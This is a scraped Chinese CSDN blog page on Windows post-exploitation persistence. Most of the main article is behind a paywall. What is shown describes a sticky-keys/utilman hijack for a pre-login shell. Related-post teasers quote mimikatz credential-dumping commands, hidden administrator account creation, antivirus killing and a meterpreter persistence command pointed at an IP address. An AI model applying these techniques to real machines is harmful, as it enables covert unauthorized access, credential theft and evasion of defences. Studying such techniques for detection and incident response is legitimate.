全!最新Windows后渗透之权限维持

最新推荐文章于 2024-05-06 13:17:02 发布
最新推荐文章于 2024-05-06 13:17:02 发布
阅读量482 收藏
点赞数
分类专栏: 技术文 新闻 免费分享 文章标签: windows terminal 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Appleteachers/article/details/116791055
版权
本文详细介绍了Windows后渗透中的权限维持技巧,包括辅助功能劫持、镜像劫持、启动目录利用、隐藏文件、注册表后门、服务后门、计划任务后门、Winlogon用户登录初始化及Logon Scripts后门。通过这些方法,可以实现在系统中的持久化存在,绕过安全防护。
摘要由CSDN通过智能技术生成

Windows后渗透之权限维持

辅助功能劫持
Windows10 有一些辅助功能。这些功能可以在用户登录之前以组合键启动。根据这个特征,一些恶意软件无需登录到系统,通过远程桌面协议就可以执行恶意代码。
一些常见的辅助功能如:

 C:\Windows\System32\sethc.exe    粘滞键    快捷键:按五次 shift 键
 C:\Windows\System32\utilman.exe     设置中心   快捷键:Windows+U 键
 C:\Windows\System32\Magnify.exe    放大镜      快捷键:Windows+加减号

最常见的验证方法就是将cmd.exe的文件名换成上面的名字,然后使用对应的快捷键就可以调出cmd窗口了。
可能会遇到的问题:
我在实现这个操作的时候会遇到需要TrustedInstaller权限的情况,解决方法就是打开这个文件的属性,然后在安全栏目里点击高级,然后再点击更改,再点击一次高级,进入之后点击立即查找,双击你有权限操作的用户就可以了。
在这里插入图片描述
在这里插入图片描述

最低0.47元/天 解锁文章
渗透Windows信息收集
谢公子的博客
11-30 3556
在获取了Windows系统权限后,我们就需要尽可能多的收集这台机器上的各种信息,各种密码,如: Windows账号密码:传送门——>Windows中获取用户密码 浏览器账号密码: VPN账号密码: mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit WIFI账号密码 #显示连接过的WIFI netsh wlan show profiles netsh wlan export .
内网渗透-windows权限维持的方法
lza20001103的博客
08-26 1256
windows权限维持的方法 文章目录windows权限维持的方法一、影子账户二、粘滞键后门三、logon scripts后门五、注册表自启动后门六、屏幕保护程序后门七、计划任务后门八、服务自启动后门九、黄金票据十、白银票据十二、bitsadmin十五、CLR劫持 一、影子账户 1.使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用
windows系统后渗透阶段权限维持方法小结
闵行小鱼塘
07-02 634
归纳下windows系统维持权限的方法
渗透——权限维持
FisrtBqy的博客
04-26 2243
权限维持 1 Windows权限维持 1.1 用户维持(克隆账号) 1.1.1 添加一般隐藏用户的方式 net user username$ passwd /add 使用net user命令查看用户,发现没有username$这个用户 但是通过控制面板→管理账户中可以看到该用户。 1.1.2 注册表克隆用户隐藏 需要先完成上一步🙄 打开注册表编辑器:Win+R→regedit,找到如下路径: 发现SAM路径下没有权限查看,这里修改权限:菜单栏编辑→权限,修改后F5刷新
Windows渗透--维持权限十九式
weixin_44155363的博客
06-15 1675
0x00:前言 维持权限后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用. 0x01:"经典的"shift后门 这个算是比较古老还比较"经典的"的隐藏方式了,这里简单讲一下,在windows中有一些辅助功能,能在用户未登录系统之前可以通过组合键来启动它,类似的辅助功能有: 1、C:\Windows\System32\sethc.exe 粘滞键,启动
windows渗透攻击
weixin_30508309的博客
11-27 320
---恢复内容开始--- 从打开的meterpreter shell 打开 cmd 在cmd中运行wmic就可以得到系统相关信息 win10一些提权操作我都失败了 在win7中一下是我成功提权使用的模块 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protect...
内网渗透windows权限维持
07-18
windows的进程查看器(dll)
内网渗透-windows权限维持
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-27 579
渗透的过程中,为了长期对目标有着控制权,就要学会权限维持的技能。隐藏用户、webshell、远控、记密码……
2024年最新Windows权限维持技术总结、复现_cs权限维持,网络安全开发技术总结
最新发布
2401_84264692的博客
05-06 907
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
Windows权限维持技术总结、复现_cs权限维持(1)
2401_84297035的博客
04-26 1034
利用 windows 开机启动项实现权限维持,每次系统启动都可实现后门的执行,很不错的权限维持的方式影子账户,顾名思义就像影子一样,跟主体是一模一样的,通过建立影子账户,可以获得跟管理员一样的权限,它无法通过普通命令进行查询,只能在注册表中找到其详细信息。映像劫持,也叫重定向劫持。即想运行 A.exe,结果运行的是B.exe。在 Windows NT 架构的系统中,IFEO 的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。
meterpreter后渗透权限维持
weixin_44255856的博客
08-09 3122
Persistence后门 使用此方法建议运行前关闭杀毒软件 Run post/windows/manage/killav 输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。 详细信息如下: -A 自动启动一个匹配的漏洞/多/处理程序来连接到代理 -L如果不使用%TEMP%,则选择目标主机中写入有效负载的...
Windows影子用户及其相应的漏洞后渗透
weixin_51339377的博客
04-14 1954
#当获得一条shell后,可以创建一个影子用户,通过影子用户可以行驶正常用户的所有权限与功能, 并且只可在注册表中被检测出来---(应急响应注册表很重要) 1.首先需要拥有权限创建一个Administrator用户,并分配管理员权限。 net user haha$ 123 /add #创建一个新用户haha 密码是123 net localgroup administrators haha$ /add #将该新用户移动到管理员组下 net localgroup users ...
12.6、后渗透测试--Windows系统下信息收集模块
无痕的博客
12-14 459
meterpreter后渗透阶段,搜集windows信息
渗透权限维持——隐藏用户的创建和使用(程干货)
MachineGunJoe666
05-24 1488
0x00 前言 在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用,但是这也引出了一个问题,只要是登录进程就一定会留下痕迹,虽然在渗透完成后可以通过痕迹清理的方法清除自己登录的"证据",但是在多次渗透的过程中我不禁产生了思考,有没有一种方法能够最大化的隐藏自己登陆过对方主机呢,于是便有了下文 0x01 隐藏用户(影子用户)的创建与利用进行权限维持 这里先提一个概念,在windows环境下创建用户如果后面带了一个"$"符号,在ne...
渗透攻击
不忘初心,护天下安全!
12-01 2122
权限提升 权限提升简称<提权>,是一种通过各种办法和漏洞,提高自己在服务器中的权限,以便控制部资源的方法。比如在Windows中就是获得System的权限,在Linux就是获得root的权限 一般提权的方法有 系统漏洞提权 数据库提权 权限继承类提权 第三方软件/服务提权 Linux系统提权 Linux系统漏洞的exp一般按照内核版本来命名:2.6.18-194或...
内网渗透-window权限维持
lza20001103的博客
09-26 2259
window权限维持 文章目录window权限维持前言meterpreter权限维持persistencemetsvc系统工具替换后门iexplore.exenarratoroskutilmannotepadmsf模块开机自启动注册表项nc后门schtasks快捷方式劫持账号隐藏后记 前言 上期讲完了横向移动后,我们拿到了管理员的权限,当我们离开时,下一次要是还想拿到的是管理员的权限呢,难道我们还要继续一波操作提取啥的吗,其实不然,接下来将是最重要的内容,就是我们的权限维持的操作了,对于后渗透有着至关重要的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值